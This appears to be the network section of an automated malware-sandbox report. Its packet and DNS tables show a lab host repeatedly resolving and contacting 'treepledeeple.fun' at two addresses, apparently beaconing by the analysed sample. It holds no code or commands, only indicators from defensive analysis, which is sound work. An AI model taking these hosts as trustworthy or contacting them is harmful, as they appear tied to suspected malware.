Sep 15, 2023 11:23:56.251564980 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.251621962 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.251668930 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.251718998 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.251729012 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.251769066 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.251826048 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.251857996 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.251868963 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.251912117 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.251920938 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.251962900 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.251971960 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.252032995 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.252057076 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.252119064 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.252129078 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.252288103 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.252317905 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.252383947 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.252394915 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.252497911 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.252578974 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.252665997 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.252774954 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.252803087 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.252811909 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.252861023 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.252959013 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:57.023040056 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:57.023056984 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:57.023189068 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:57.029812098 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:24:16.415529966 CEST	49723	80	192.168.2.5	104.21.87.11

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 15, 2023 11:23:18.588290930 CEST	54988	53	192.168.2.5	8.8.8.8
Sep 15, 2023 11:23:18.629722118 CEST	53183	53	192.168.2.5	8.8.8.8
Sep 15, 2023 11:23:18.639838934 CEST	60422	53	192.168.2.5	8.8.8.8
Sep 15, 2023 11:23:18.703491926 CEST	53	54988	8.8.8.8	192.168.2.5
Sep 15, 2023 11:23:18.733391047 CEST	53	53183	8.8.8.8	192.168.2.5
Sep 15, 2023 11:23:18.755693913 CEST	53	60422	8.8.8.8	192.168.2.5
Sep 15, 2023 11:23:19.317269087 CEST	64219	53	192.168.2.5	8.8.8.8
Sep 15, 2023 11:23:19.420555115 CEST	53	64219	8.8.8.8	192.168.2.5
Sep 15, 2023 11:23:21.261416912 CEST	55252	53	192.168.2.5	8.8.8.8
Sep 15, 2023 11:23:21.365873098 CEST	53	55252	8.8.8.8	192.168.2.5
Sep 15, 2023 11:23:21.901774883 CEST	64997	53	192.168.2.5	8.8.8.8
Sep 15, 2023 11:23:22.005810976 CEST	53	64997	8.8.8.8	192.168.2.5
Sep 15, 2023 11:23:22.500780106 CEST	62449	53	192.168.2.5	8.8.8.8
Sep 15, 2023 11:23:22.597722054 CEST	53	62449	8.8.8.8	192.168.2.5
Sep 15, 2023 11:23:23.305031061 CEST	51019	53	192.168.2.5	8.8.8.8
Sep 15, 2023 11:23:23.407272100 CEST	53	51019	8.8.8.8	192.168.2.5
Sep 15, 2023 11:23:23.831358910 CEST	53007	53	192.168.2.5	8.8.8.8
Sep 15, 2023 11:23:23.928433895 CEST	53	53007	8.8.8.8	192.168.2.5
Sep 15, 2023 11:23:24.334343910 CEST	56634	53	192.168.2.5	8.8.8.8
Sep 15, 2023 11:23:24.431586981 CEST	53	56634	8.8.8.8	192.168.2.5
Sep 15, 2023 11:23:24.900969982 CEST	56046	53	192.168.2.5	8.8.8.8
Sep 15, 2023 11:23:25.004156113 CEST	53	56046	8.8.8.8	192.168.2.5
Sep 15, 2023 11:23:25.423012018 CEST	51513	53	192.168.2.5	8.8.8.8
Sep 15, 2023 11:23:25.519850016 CEST	53	51513	8.8.8.8	192.168.2.5
Sep 15, 2023 11:23:26.016930103 CEST	60447	53	192.168.2.5	8.8.8.8
Sep 15, 2023 11:23:26.113590002 CEST	53	60447	8.8.8.8	192.168.2.5
Sep 15, 2023 11:23:26.559880972 CEST	56852	53	192.168.2.5	8.8.8.8
Sep 15, 2023 11:23:26.656590939 CEST	53	56852	8.8.8.8	192.168.2.5
Sep 15, 2023 11:23:27.487034082 CEST	54947	53	192.168.2.5	8.8.8.8
Sep 15, 2023 11:23:27.584068060 CEST	53	54947	8.8.8.8	192.168.2.5
Sep 15, 2023 11:23:28.415838003 CEST	52465	53	192.168.2.5	8.8.8.8
Sep 15, 2023 11:23:28.513101101 CEST	53	52465	8.8.8.8	192.168.2.5
Sep 15, 2023 11:23:28.940795898 CEST	50106	53	192.168.2.5	8.8.8.8
Sep 15, 2023 11:23:29.038140059 CEST	53	50106	8.8.8.8	192.168.2.5
Sep 15, 2023 11:23:29.878181934 CEST	52947	53	192.168.2.5	8.8.8.8
Sep 15, 2023 11:23:29.977755070 CEST	53	52947	8.8.8.8	192.168.2.5
Sep 15, 2023 11:23:30.442800999 CEST	53460	53	192.168.2.5	8.8.8.8
Sep 15, 2023 11:23:30.539778948 CEST	53	53460	8.8.8.8	192.168.2.5
Sep 15, 2023 11:23:30.966862917 CEST	63275	53	192.168.2.5	8.8.8.8
Sep 15, 2023 11:23:31.070738077 CEST	53	63275	8.8.8.8	192.168.2.5
Sep 15, 2023 11:23:31.461317062 CEST	57156	53	192.168.2.5	8.8.8.8
Sep 15, 2023 11:23:31.558307886 CEST	53	57156	8.8.8.8	192.168.2.5
Sep 15, 2023 11:23:31.980350018 CEST	59551	53	192.168.2.5	8.8.8.8
Sep 15, 2023 11:23:32.076773882 CEST	53	59551	8.8.8.8	192.168.2.5
Sep 15, 2023 11:23:32.800868034 CEST	63616	53	192.168.2.5	8.8.8.8
Sep 15, 2023 11:23:32.897330046 CEST	53	63616	8.8.8.8	192.168.2.5
Sep 15, 2023 11:23:33.614058018 CEST	59138	53	192.168.2.5	8.8.8.8
Sep 15, 2023 11:23:33.711306095 CEST	53	59138	8.8.8.8	192.168.2.5
Sep 15, 2023 11:23:34.199867964 CEST	50910	53	192.168.2.5	8.8.8.8
Sep 15, 2023 11:23:34.296719074 CEST	53	50910	8.8.8.8	192.168.2.5
Sep 15, 2023 11:23:34.777782917 CEST	63240	53	192.168.2.5	8.8.8.8
Sep 15, 2023 11:23:34.874140024 CEST	53	63240	8.8.8.8	192.168.2.5
Sep 15, 2023 11:23:35.413537025 CEST	61182	53	192.168.2.5	8.8.8.8
Sep 15, 2023 11:23:35.510530949 CEST	53	61182	8.8.8.8	192.168.2.5
Sep 15, 2023 11:23:36.554516077 CEST	59859	53	192.168.2.5	8.8.8.8
Sep 15, 2023 11:23:36.650846004 CEST	53	59859	8.8.8.8	192.168.2.5
Sep 15, 2023 11:23:37.102585077 CEST	56751	53	192.168.2.5	8.8.8.8
Sep 15, 2023 11:23:37.199210882 CEST	53	56751	8.8.8.8	192.168.2.5
Sep 15, 2023 11:23:37.691217899 CEST	56646	53	192.168.2.5	8.8.8.8
Sep 15, 2023 11:23:37.787431955 CEST	53	56646	8.8.8.8	192.168.2.5
Sep 15, 2023 11:23:38.289138079 CEST	50546	53	192.168.2.5	8.8.8.8
Sep 15, 2023 11:23:38.385600090 CEST	53	50546	8.8.8.8	192.168.2.5
Sep 15, 2023 11:23:49.102539062 CEST	62943	53	192.168.2.5	8.8.8.8
Sep 15, 2023 11:23:49.199325085 CEST	53	62943	8.8.8.8	192.168.2.5
Sep 15, 2023 11:23:49.688004971 CEST	49202	53	192.168.2.5	8.8.8.8
Sep 15, 2023 11:23:49.784730911 CEST	53	49202	8.8.8.8	192.168.2.5
Sep 15, 2023 11:23:50.253556013 CEST	60503	53	192.168.2.5	8.8.8.8
Sep 15, 2023 11:23:50.353044987 CEST	53	60503	8.8.8.8	192.168.2.5
Sep 15, 2023 11:23:50.785172939 CEST	59369	53	192.168.2.5	8.8.8.8
Sep 15, 2023 11:23:50.882553101 CEST	53	59369	8.8.8.8	192.168.2.5
Sep 15, 2023 11:23:51.322566986 CEST	52943	53	192.168.2.5	8.8.8.8
Sep 15, 2023 11:23:51.413521051 CEST	53	52943	8.8.8.8	192.168.2.5
Sep 15, 2023 11:23:51.966675997 CEST	64101	53	192.168.2.5	8.8.8.8
Sep 15, 2023 11:23:52.063651085 CEST	53	64101	8.8.8.8	192.168.2.5
Sep 15, 2023 11:23:52.765450954 CEST	56054	53	192.168.2.5	8.8.8.8
Sep 15, 2023 11:23:52.861910105 CEST	53	56054	8.8.8.8	192.168.2.5
Sep 15, 2023 11:23:55.385869026 CEST	59485	53	192.168.2.5	8.8.8.8
Sep 15, 2023 11:23:55.482979059 CEST	53	59485	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 15, 2023 11:23:18.588290930 CEST	192.168.2.5	8.8.8.8	0xe3cc	Standard query (0)	www.bolidesoft.com	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:18.629722118 CEST	192.168.2.5	8.8.8.8	0xe8cb	Standard query (0)	treepledeeple.fun	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:18.639838934 CEST	192.168.2.5	8.8.8.8	0x6af8	Standard query (0)	www.highmotionsoftware.com	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:19.317269087 CEST	192.168.2.5	8.8.8.8	0xcf73	Standard query (0)	treepledeeple.fun	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:21.261416912 CEST	192.168.2.5	8.8.8.8	0xad7e	Standard query (0)	treepledeeple.fun	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:21.901774883 CEST	192.168.2.5	8.8.8.8	0xedfe	Standard query (0)	treepledeeple.fun	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:22.500780106 CEST	192.168.2.5	8.8.8.8	0x7445	Standard query (0)	treepledeeple.fun	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:23.305031061 CEST	192.168.2.5	8.8.8.8	0x8c13	Standard query (0)	treepledeeple.fun	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:23.831358910 CEST	192.168.2.5	8.8.8.8	0x8830	Standard query (0)	treepledeeple.fun	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:24.334343910 CEST	192.168.2.5	8.8.8.8	0x96e	Standard query (0)	treepledeeple.fun	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:24.900969982 CEST	192.168.2.5	8.8.8.8	0x394b	Standard query (0)	treepledeeple.fun	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:25.423012018 CEST	192.168.2.5	8.8.8.8	0x9c1	Standard query (0)	treepledeeple.fun	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:26.016930103 CEST	192.168.2.5	8.8.8.8	0xc62d	Standard query (0)	treepledeeple.fun	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:26.559880972 CEST	192.168.2.5	8.8.8.8	0x13f1	Standard query (0)	treepledeeple.fun	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:27.487034082 CEST	192.168.2.5	8.8.8.8	0x1b19	Standard query (0)	treepledeeple.fun	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:28.415838003 CEST	192.168.2.5	8.8.8.8	0x7155	Standard query (0)	treepledeeple.fun	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:28.940795898 CEST	192.168.2.5	8.8.8.8	0x3fac	Standard query (0)	treepledeeple.fun	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:29.878181934 CEST	192.168.2.5	8.8.8.8	0x4bf7	Standard query (0)	treepledeeple.fun	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:30.442800999 CEST	192.168.2.5	8.8.8.8	0x9831	Standard query (0)	treepledeeple.fun	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:30.966862917 CEST	192.168.2.5	8.8.8.8	0x7c50	Standard query (0)	treepledeeple.fun	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:31.461317062 CEST	192.168.2.5	8.8.8.8	0xb029	Standard query (0)	treepledeeple.fun	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:31.980350018 CEST	192.168.2.5	8.8.8.8	0x5fb0	Standard query (0)	treepledeeple.fun	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:32.800868034 CEST	192.168.2.5	8.8.8.8	0x17b	Standard query (0)	treepledeeple.fun	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:33.614058018 CEST	192.168.2.5	8.8.8.8	0x46f4	Standard query (0)	treepledeeple.fun	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:34.199867964 CEST	192.168.2.5	8.8.8.8	0x843a	Standard query (0)	treepledeeple.fun	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:34.777782917 CEST	192.168.2.5	8.8.8.8	0xc1d6	Standard query (0)	treepledeeple.fun	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:35.413537025 CEST	192.168.2.5	8.8.8.8	0xb1e9	Standard query (0)	treepledeeple.fun	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:36.554516077 CEST	192.168.2.5	8.8.8.8	0x4be6	Standard query (0)	treepledeeple.fun	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:37.102585077 CEST	192.168.2.5	8.8.8.8	0x1939	Standard query (0)	treepledeeple.fun	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:37.691217899 CEST	192.168.2.5	8.8.8.8	0x832d	Standard query (0)	treepledeeple.fun	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:38.289138079 CEST	192.168.2.5	8.8.8.8	0x70ca	Standard query (0)	treepledeeple.fun	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:49.102539062 CEST	192.168.2.5	8.8.8.8	0xec3c	Standard query (0)	treepledeeple.fun	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:49.688004971 CEST	192.168.2.5	8.8.8.8	0x4f4c	Standard query (0)	treepledeeple.fun	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:50.253556013 CEST	192.168.2.5	8.8.8.8	0x282a	Standard query (0)	treepledeeple.fun	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:50.785172939 CEST	192.168.2.5	8.8.8.8	0x9810	Standard query (0)	treepledeeple.fun	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:51.322566986 CEST	192.168.2.5	8.8.8.8	0x1bb4	Standard query (0)	treepledeeple.fun	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:51.966675997 CEST	192.168.2.5	8.8.8.8	0xe9ed	Standard query (0)	treepledeeple.fun	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:52.765450954 CEST	192.168.2.5	8.8.8.8	0xc28f	Standard query (0)	treepledeeple.fun	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:55.385869026 CEST	192.168.2.5	8.8.8.8	0x2732	Standard query (0)	treepledeeple.fun	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 15, 2023 11:23:18.703491926 CEST	8.8.8.8	192.168.2.5	0xe3cc	No error (0)	www.bolidesoft.com	bolidesoft.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 15, 2023 11:23:18.703491926 CEST	8.8.8.8	192.168.2.5	0xe3cc	No error (0)	bolidesoft.com		104.193.111.117	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:18.733391047 CEST	8.8.8.8	192.168.2.5	0xe8cb	No error (0)	treepledeeple.fun		172.67.139.34	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:18.733391047 CEST	8.8.8.8	192.168.2.5	0xe8cb	No error (0)	treepledeeple.fun		104.21.87.11	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:18.755693913 CEST	8.8.8.8	192.168.2.5	0x6af8	No error (0)	www.highmotionsoftware.com	highmotionsoftware.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 15, 2023 11:23:18.755693913 CEST	8.8.8.8	192.168.2.5	0x6af8	No error (0)	highmotionsoftware.com		104.193.111.101	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:19.420555115 CEST	8.8.8.8	192.168.2.5	0xcf73	No error (0)	treepledeeple.fun		104.21.87.11	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:19.420555115 CEST	8.8.8.8	192.168.2.5	0xcf73	No error (0)	treepledeeple.fun		172.67.139.34	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:21.365873098 CEST	8.8.8.8	192.168.2.5	0xad7e	No error (0)	treepledeeple.fun		172.67.139.34	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:21.365873098 CEST	8.8.8.8	192.168.2.5	0xad7e	No error (0)	treepledeeple.fun		104.21.87.11	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:22.005810976 CEST	8.8.8.8	192.168.2.5	0xedfe	No error (0)	treepledeeple.fun		104.21.87.11	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:22.005810976 CEST	8.8.8.8	192.168.2.5	0xedfe	No error (0)	treepledeeple.fun		172.67.139.34	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:22.597722054 CEST	8.8.8.8	192.168.2.5	0x7445	No error (0)	treepledeeple.fun		104.21.87.11	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:22.597722054 CEST	8.8.8.8	192.168.2.5	0x7445	No error (0)	treepledeeple.fun		172.67.139.34	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:23.407272100 CEST	8.8.8.8	192.168.2.5	0x8c13	No error (0)	treepledeeple.fun		172.67.139.34	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:23.407272100 CEST	8.8.8.8	192.168.2.5	0x8c13	No error (0)	treepledeeple.fun		104.21.87.11	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:23.928433895 CEST	8.8.8.8	192.168.2.5	0x8830	No error (0)	treepledeeple.fun		104.21.87.11	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:23.928433895 CEST	8.8.8.8	192.168.2.5	0x8830	No error (0)	treepledeeple.fun		172.67.139.34	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:24.431586981 CEST	8.8.8.8	192.168.2.5	0x96e	No error (0)	treepledeeple.fun		172.67.139.34	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:24.431586981 CEST	8.8.8.8	192.168.2.5	0x96e	No error (0)	treepledeeple.fun		104.21.87.11	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:25.004156113 CEST	8.8.8.8	192.168.2.5	0x394b	No error (0)	treepledeeple.fun		172.67.139.34	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:25.004156113 CEST	8.8.8.8	192.168.2.5	0x394b	No error (0)	treepledeeple.fun		104.21.87.11	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:25.519850016 CEST	8.8.8.8	192.168.2.5	0x9c1	No error (0)	treepledeeple.fun		104.21.87.11	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:25.519850016 CEST	8.8.8.8	192.168.2.5	0x9c1	No error (0)	treepledeeple.fun		172.67.139.34	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:26.113590002 CEST	8.8.8.8	192.168.2.5	0xc62d	No error (0)	treepledeeple.fun		172.67.139.34	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:26.113590002 CEST	8.8.8.8	192.168.2.5	0xc62d	No error (0)	treepledeeple.fun		104.21.87.11	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:26.656590939 CEST	8.8.8.8	192.168.2.5	0x13f1	No error (0)	treepledeeple.fun		104.21.87.11	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:26.656590939 CEST	8.8.8.8	192.168.2.5	0x13f1	No error (0)	treepledeeple.fun		172.67.139.34	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:27.584068060 CEST	8.8.8.8	192.168.2.5	0x1b19	No error (0)	treepledeeple.fun		104.21.87.11	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:27.584068060 CEST	8.8.8.8	192.168.2.5	0x1b19	No error (0)	treepledeeple.fun		172.67.139.34	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:28.513101101 CEST	8.8.8.8	192.168.2.5	0x7155	No error (0)	treepledeeple.fun		172.67.139.34	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:28.513101101 CEST	8.8.8.8	192.168.2.5	0x7155	No error (0)	treepledeeple.fun		104.21.87.11	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:29.038140059 CEST	8.8.8.8	192.168.2.5	0x3fac	No error (0)	treepledeeple.fun		172.67.139.34	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:29.038140059 CEST	8.8.8.8	192.168.2.5	0x3fac	No error (0)	treepledeeple.fun		104.21.87.11	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:29.977755070 CEST	8.8.8.8	192.168.2.5	0x4bf7	No error (0)	treepledeeple.fun		172.67.139.34	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:29.977755070 CEST	8.8.8.8	192.168.2.5	0x4bf7	No error (0)	treepledeeple.fun		104.21.87.11	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:30.539778948 CEST	8.8.8.8	192.168.2.5	0x9831	No error (0)	treepledeeple.fun		172.67.139.34	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:30.539778948 CEST	8.8.8.8	192.168.2.5	0x9831	No error (0)	treepledeeple.fun		104.21.87.11	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:31.070738077 CEST	8.8.8.8	192.168.2.5	0x7c50	No error (0)	treepledeeple.fun		172.67.139.34	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:31.070738077 CEST	8.8.8.8	192.168.2.5	0x7c50	No error (0)	treepledeeple.fun		104.21.87.11	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:31.558307886 CEST	8.8.8.8	192.168.2.5	0xb029	No error (0)	treepledeeple.fun		104.21.87.11	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:31.558307886 CEST	8.8.8.8	192.168.2.5	0xb029	No error (0)	treepledeeple.fun		172.67.139.34	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:32.076773882 CEST	8.8.8.8	192.168.2.5	0x5fb0	No error (0)	treepledeeple.fun		172.67.139.34	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:32.076773882 CEST	8.8.8.8	192.168.2.5	0x5fb0	No error (0)	treepledeeple.fun		104.21.87.11	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:32.897330046 CEST	8.8.8.8	192.168.2.5	0x17b	No error (0)	treepledeeple.fun		172.67.139.34	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:32.897330046 CEST	8.8.8.8	192.168.2.5	0x17b	No error (0)	treepledeeple.fun		104.21.87.11	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:33.711306095 CEST	8.8.8.8	192.168.2.5	0x46f4	No error (0)	treepledeeple.fun		104.21.87.11	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:33.711306095 CEST	8.8.8.8	192.168.2.5	0x46f4	No error (0)	treepledeeple.fun		172.67.139.34	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:34.296719074 CEST	8.8.8.8	192.168.2.5	0x843a	No error (0)	treepledeeple.fun		104.21.87.11	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:34.296719074 CEST	8.8.8.8	192.168.2.5	0x843a	No error (0)	treepledeeple.fun		172.67.139.34	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:34.874140024 CEST	8.8.8.8	192.168.2.5	0xc1d6	No error (0)	treepledeeple.fun		172.67.139.34	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:34.874140024 CEST	8.8.8.8	192.168.2.5	0xc1d6	No error (0)	treepledeeple.fun		104.21.87.11	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:35.510530949 CEST	8.8.8.8	192.168.2.5	0xb1e9	No error (0)	treepledeeple.fun		172.67.139.34	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:35.510530949 CEST	8.8.8.8	192.168.2.5	0xb1e9	No error (0)	treepledeeple.fun		104.21.87.11	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:36.650846004 CEST	8.8.8.8	192.168.2.5	0x4be6	No error (0)	treepledeeple.fun		172.67.139.34	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:36.650846004 CEST	8.8.8.8	192.168.2.5	0x4be6	No error (0)	treepledeeple.fun		104.21.87.11	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:37.199210882 CEST	8.8.8.8	192.168.2.5	0x1939	No error (0)	treepledeeple.fun		172.67.139.34	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:37.199210882 CEST	8.8.8.8	192.168.2.5	0x1939	No error (0)	treepledeeple.fun		104.21.87.11	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:37.787431955 CEST	8.8.8.8	192.168.2.5	0x832d	No error (0)	treepledeeple.fun		172.67.139.34	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:37.787431955 CEST	8.8.8.8	192.168.2.5	0x832d	No error (0)	treepledeeple.fun		104.21.87.11	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:38.385600090 CEST	8.8.8.8	192.168.2.5	0x70ca	No error (0)	treepledeeple.fun		104.21.87.11	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:38.385600090 CEST	8.8.8.8	192.168.2.5	0x70ca	No error (0)	treepledeeple.fun		172.67.139.34	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:49.199325085 CEST	8.8.8.8	192.168.2.5	0xec3c	No error (0)	treepledeeple.fun		104.21.87.11	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:49.199325085 CEST	8.8.8.8	192.168.2.5	0xec3c	No error (0)	treepledeeple.fun		172.67.139.34	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:49.784730911 CEST	8.8.8.8	192.168.2.5	0x4f4c	No error (0)	treepledeeple.fun		172.67.139.34	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:49.784730911 CEST	8.8.8.8	192.168.2.5	0x4f4c	No error (0)	treepledeeple.fun		104.21.87.11	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:50.353044987 CEST	8.8.8.8	192.168.2.5	0x282a	No error (0)	treepledeeple.fun		104.21.87.11	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:50.353044987 CEST	8.8.8.8	192.168.2.5	0x282a	No error (0)	treepledeeple.fun		172.67.139.34	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:50.882553101 CEST	8.8.8.8	192.168.2.5	0x9810	No error (0)	treepledeeple.fun		172.67.139.34	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:50.882553101 CEST	8.8.8.8	192.168.2.5	0x9810	No error (0)	treepledeeple.fun		104.21.87.11	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:51.413521051 CEST	8.8.8.8	192.168.2.5	0x1bb4	No error (0)	treepledeeple.fun		104.21.87.11	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:51.413521051 CEST	8.8.8.8	192.168.2.5	0x1bb4	No error (0)	treepledeeple.fun		172.67.139.34	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:52.063651085 CEST	8.8.8.8	192.168.2.5	0xe9ed	No error (0)	treepledeeple.fun		104.21.87.11	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:52.063651085 CEST	8.8.8.8	192.168.2.5	0xe9ed	No error (0)	treepledeeple.fun		172.67.139.34	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:52.861910105 CEST	8.8.8.8	192.168.2.5	0xc28f	No error (0)	treepledeeple.fun		172.67.139.34	A (IP address)	IN (0x0001)	false
